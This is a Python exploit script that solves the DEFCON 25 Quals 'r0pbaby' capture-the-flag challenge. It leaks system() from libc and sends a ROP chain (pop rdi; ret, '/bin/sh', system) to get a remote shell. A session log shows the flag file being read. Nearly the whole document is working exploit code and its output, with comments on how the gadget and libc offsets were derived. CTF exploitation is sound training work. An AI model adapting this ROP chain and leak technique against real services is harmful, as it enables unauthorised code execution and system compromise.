DEFCON 25 Quals r0pbaby
#!/usr/bin/env python3
import struct
import sys
import telnetlib
# Challenge endpoint. The hostname carries a per-challenge hash, so it only
# resolved on the original quals infrastructure; point these at a local
# instance of the binary to re-run the script.
HOST: str = 'r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me'
PORT: int = 10436
"""
% strings -tx libc-2.19_15.so|grep "/bin/sh"
17ccdb /bin/sh
% rp --file=libc-2.19_15.so --rop=1 --unique|grep "pop rdi"
0x000fa47a: pop rdi ; call rax ; (1 found)
0x000831a8: pop rdi ; jmp rax ; (2 found)
0x00103fe2: pop rdi ; rep ret ; (2 found)
0x00022b1a: pop rdi ; ret ; (506 found)
0x001331ad: pop rdi ; retn 0xFFEE ; (1 found)
"""
# Offsets into libc-2.19_15.so, the libc shipped with the challenge. They are
# only valid for that exact build; any other libc needs all three re-derived.
#   binsh_offset  - the "/bin/sh" string, from the `strings -tx` run above
#   system_offset - system(); not shown in the listing above, presumably
#                   taken from nm/readelf on the same file (its low 12 bits,
#                   0x640, agree with the leaked address in the session below)
#   popret_offset - the `pop rdi ; ret` gadget picked from the `rp` run above
binsh_offset: int = 0x17ccdb
system_offset: int = 0x46640
popret_offset: int = 0x22b1a
def rp(addr: int) -> bytes:
    """Encode *addr* as one little-endian 64-bit word of the ROP chain.

    Raises struct.error if *addr* is negative or does not fit in 64 bits.
    """
    return struct.pack('<Q', addr)
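def get_addr(tn, name: str, timeout=None) -> int:
    """Ask the service for the runtime address of the libc symbol *name*.

    Drives menu option 2 ("Get address of a libc function"), waits for the
    "<name>: " echo and parses the hex value on the rest of that line.

    Args:
        tn: a connected telnetlib.Telnet session sitting at the menu.
        name: libc symbol to look up; sent to the service verbatim.
        timeout: optional per-read timeout in seconds (None blocks forever),
            so a silent service does not hang the script.

    Returns:
        The leaked address as an int; it is also printed to stdout.

    Raises:
        ValueError: the reply was not a hex address (symbol not found, read
            timed out, or the service answered something else entirely).
    """
    tn.write(b'2\n' + name.encode() + b'\n')
    tn.read_until(name.encode() + b': ', timeout)
    buf = tn.read_until(b'\n', timeout)
    # int(..., 16) accepts an optional "0x" prefix, which is what the service
    # prints; anything else (error text, an empty read on timeout) is rejected
    # here with the raw reply instead of an opaque int() failure.
    try:
        addr = int(buf.decode(errors='replace').strip(), 16)
    except ValueError:
        raise ValueError('unexpected reply for {0!r}: {1!r}'.format(name, buf)) from None
    print(name + ' :{0}'.format(hex(addr)))
    return addr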
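def exploit() -> None:
    """Leak system(), build the ROP chain, send it and hand over the shell.

    Chain layout, low to high stack address:
        8 bytes of filler   - fills the slot before the return address
                              (presumably the saved rbp; not verifiable here)
        pop rdi ; ret       - gadget, pops the next word into rdi
        "/bin/sh"           - libc string, becomes system()'s argument
        system              - returned into with rdi = "/bin/sh"

    Every address is derived from the single leaked system() plus the
    build-specific offsets above, so a wrong libc build breaks the chain.

    NOTE: telnetlib is deprecated since Python 3.11 and removed in 3.13
    (PEP 594); a plain socket is the long-term replacement.

    Raises:
        RuntimeError: the leak does not fit the libc build the offsets were
            taken from, or the chain exceeds the service's input limit.
    """
    tn = telnetlib.Telnet(HOST, PORT)
    try:
        system = get_addr(tn, 'system')
        # libc is mapped page-aligned, so the low 12 bits of every symbol are
        # fixed by the build (the session below shows ...640 for 0x46640). A
        # mismatch means the offsets belong to another libc and the chain
        # would return into garbage.
        if (system & 0xfff) != (system_offset & 0xfff):
            raise RuntimeError(
                'leaked system() {0:#x} does not match page offset {1:#x}; '
                'offsets are for a different libc build'
                .format(system, system_offset & 0xfff))
        libc_base = system - system_offset
        chain = b'deadbeef'
        chain += rp(libc_base + popret_offset)
        chain += rp(libc_base + binsh_offset)
        chain += rp(system)
        # The service prompt announces "max 1024" bytes for option 3.
        if len(chain) > 1024:
            raise RuntimeError('ROP chain is {0} bytes, over the 1024 limit'.format(len(chain)))
        tn.write(b'3\n')
        # Length is derived from the chain rather than hard-coded (it is 32).
        tn.write(str(len(chain)).encode() + b'\n')
        # Send the chain on the raw socket: Telnet.write() doubles every 0xff
        # byte (telnet IAC), which would corrupt any address containing 0xff.
        tn.get_socket().sendall(chain + b'\n')
        tn.interact()
    finally:
        tn.close()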
def main() -> None:
    """Script entry point: run the exploit against HOST:PORT."""
    exploit()
# Only fire the exploit when run as a script, not when imported.
if __name__ == "__main__":
    main()
"""
% python exploit.py
system :0x7f6066881640
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
cat /home/r0pbaby/flag
The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
"""